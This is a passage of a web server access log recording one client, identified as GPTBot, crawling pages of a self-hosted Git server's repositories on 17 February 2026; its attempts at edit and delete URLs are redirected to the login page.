Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog/PKG-00.toc" -[17/Feb/2026:18:14:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/PostgresMonitor/build/PostgresWatchdog/PKG-00.toc" -[17/Feb/2026:18:14:49 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/PostgresMonitor/build/PostgresWatchdog/EXE-00.toc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog/EXE-00.toc" -[17/Feb/2026:18:14:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/PostgresMonitor/build/PostgresWatchdog/EXE-00.toc" -[17/Feb/2026:18:14:50 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/PostgresMonitor/build/PostgresWatchdog/PYZ-00.toc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog/PYZ-00.toc" -[17/Feb/2026:18:14:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/PostgresMonitor/build/PostgresWatchdog/PYZ-00.toc" -[17/Feb/2026:18:14:50 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_edit/main/asset_pilot_docker/.venv/bin/pip3" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/pip3" -[17/Feb/2026:18:14:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_edit/main/asset_pilot_docker/.venv/bin/pip3" -[17/Feb/2026:18:14:51 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_delete/main/asset_pilot_docker/.venv/bin/pip3" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/pip3" -[17/Feb/2026:18:14:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_delete/main/asset_pilot_docker/.venv/bin/pip3" -[17/Feb/2026:18:14:52 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/PostgresMonitor/build/PostgresWatchdog/EXE-00.toc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog/EXE-00.toc" -[17/Feb/2026:18:14:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/PostgresMonitor/build/PostgresWatchdog/EXE-00.toc" -[17/Feb/2026:18:14:52 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/PostgresMonitor/build/PostgresWatchdog/PKG-00.toc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog/PKG-00.toc" -[17/Feb/2026:18:14:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/PostgresMonitor/build/PostgresWatchdog/PKG-00.toc" -[17/Feb/2026:18:14:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/branch/main/asset_pilot_docker/.venv/bin/pip3" [Client 74.7.227.38] [Length 9837] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/pip3" -[17/Feb/2026:18:14:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&state=all&type=all" [Client 74.7.227.38] [Length 10010] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:18:14:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/PostgresMonitor/build/PostgresWatchdog/PYZ-00.toc" [Client 74.7.227.38] [Length 10110] [Gzip 3.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog/PYZ-00.toc" -[17/Feb/2026:18:14:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/PostgresMonitor/build/PostgresWatchdog/PYZ-00.toc" [Client 74.7.227.38] [Length 1492] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog/PYZ-00.toc" -[17/Feb/2026:18:14:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/PostgresMonitor/build/PostgresWatchdog/PKG-00.toc" [Client 74.7.227.38] [Length 4648] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog/PKG-00.toc" -[17/Feb/2026:18:14:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/PostgresMonitor/build/PostgresWatchdog/EXE-00.toc" [Client 74.7.227.38] [Length 16923] [Gzip 8.64] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog/EXE-00.toc" -[17/Feb/2026:18:14:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/PostgresMonitor/build/PostgresWatchdog/PKG-00.toc" [Client 74.7.227.38] [Length 1492] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog/PKG-00.toc" -[17/Feb/2026:18:14:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/PostgresMonitor/build/PostgresWatchdog/EXE-00.toc" [Client 74.7.227.38] [Length 2028] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog/EXE-00.toc" -[17/Feb/2026:18:14:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/PostgresMonitor/build/PostgresWatchdog/PKG-00.toc" [Client 74.7.227.38] [Length 14573] [Gzip 8.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog/PKG-00.toc" -[17/Feb/2026:18:14:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/PostgresMonitor/build/PostgresWatchdog/EXE-00.toc" [Client 74.7.227.38] [Length 10325] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog/EXE-00.toc" -[17/Feb/2026:18:14:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/PostgresMonitor/build/PostgresWatchdog/PKG-00.toc" [Client 74.7.227.38] [Length 10111] [Gzip 3.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog/PKG-00.toc" -[17/Feb/2026:18:14:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/PostgresMonitor/build/PostgresWatchdog/EXE-00.toc" [Client 74.7.227.38] [Length 6417] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog/EXE-00.toc" -[17/Feb/2026:18:14:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&state=all&type=all" [Client 74.7.227.38] [Length 10006] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:18:15:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10035] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:18:15:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10036] [Gzip 3.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:18:15:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/PostgresMonitor/build/PostgresWatchdog/PYZ-00.toc" [Client 74.7.227.38] [Length 23757] [Gzip 18.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog/PYZ-00.toc" -[17/Feb/2026:18:15:01 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/PostgresMonitor/build/PostgresWatchdog/EXE-00.toc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/PostgresMonitor/build/PostgresWatchdog/EXE-00.toc" -[17/Feb/2026:18:15:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/PostgresMonitor/build/PostgresWatchdog/EXE-00.toc" -[17/Feb/2026:18:15:02 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/PostgresMonitor/build/PostgresWatchdog/EXE-00.toc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/PostgresMonitor/build/PostgresWatchdog/EXE-00.toc" -[17/Feb/2026:18:15:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/PostgresMonitor/build/PostgresWatchdog/EXE-00.toc" -[17/Feb/2026:18:15:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/rss/branch/main/asset_pilot_docker/.venv/bin/pip3" [Client 74.7.227.38] [Length 951] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/pip3" -[17/Feb/2026:18:15:03 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/PostgresMonitor/build/PostgresWatchdog/PKG-00.toc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/PostgresMonitor/build/PostgresWatchdog/PKG-00.toc" -[17/Feb/2026:18:15:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/PostgresMonitor/build/PostgresWatchdog/PKG-00.toc" -[17/Feb/2026:18:15:03 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/PostgresMonitor/build/PostgresWatchdog/PKG-00.toc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/PostgresMonitor/build/PostgresWatchdog/PKG-00.toc" -[17/Feb/2026:18:15:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/PostgresMonitor/build/PostgresWatchdog/PKG-00.toc" -[17/Feb/2026:18:15:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/branch/main/asset_pilot_docker/.venv/bin/pip3" [Client 74.7.227.38] [Length 265] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/pip3" -[17/Feb/2026:18:15:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&milestone=-1&project=-1&state=all&type=all" [Client 74.7.227.38] [Length 10157] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:18:15:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10036] [Gzip 3.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:18:15:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10036] [Gzip 3.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:18:15:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/Makefile?display=rendered" [Client 74.7.227.38] [Length 11075] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/Makefile" -[17/Feb/2026:18:15:06 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/PostgresMonitor/build/PostgresWatchdog/PYZ-00.toc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/PostgresMonitor/build/PostgresWatchdog/PYZ-00.toc" -[17/Feb/2026:18:15:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/PostgresMonitor/build/PostgresWatchdog/PYZ-00.toc" -[17/Feb/2026:18:15:07 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/PostgresMonitor/build/PostgresWatchdog/PYZ-00.toc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/PostgresMonitor/build/PostgresWatchdog/PYZ-00.toc" -[17/Feb/2026:18:15:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/PostgresMonitor/build/PostgresWatchdog/PYZ-00.toc" -[17/Feb/2026:18:15:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/Makefile?display=source" [Client 74.7.227.38] [Length 17053] [Gzip 5.65] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/Makefile" -[17/Feb/2026:18:15:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/Makefile?display=source" [Client 74.7.227.38] [Length 17057] [Gzip 5.65] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/Makefile" -[17/Feb/2026:18:15:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/Makefile?display=rendered" [Client 74.7.227.38] [Length 11074] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/Makefile" -[17/Feb/2026:18:15:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/Makefile?display=source" [Client 74.7.227.38] [Length 17053] [Gzip 5.65] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/Makefile" -[17/Feb/2026:18:15:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/Makefile?display=rendered" [Client 74.7.227.38] [Length 11076] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/Makefile" -[17/Feb/2026:18:15:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/Makefile?display=rendered" [Client 74.7.227.38] [Length 11075] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/Makefile" -[17/Feb/2026:18:15:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/Makefile?display=source" [Client 74.7.227.38] [Length 17054] [Gzip 5.65] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/Makefile" -[17/Feb/2026:18:15:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/Makefile?display=source" [Client 74.7.227.38] [Length 17052] [Gzip 5.65] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/Makefile" -[17/Feb/2026:18:15:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/Makefile?display=rendered" [Client 74.7.227.38] [Length 11076] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/Makefile" -[17/Feb/2026:18:15:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&milestone=-1&project=-1&state=open&type=all" [Client 74.7.227.38] [Length 10169] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&project=-1&state=open&type=all" -[17/Feb/2026:18:15:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr 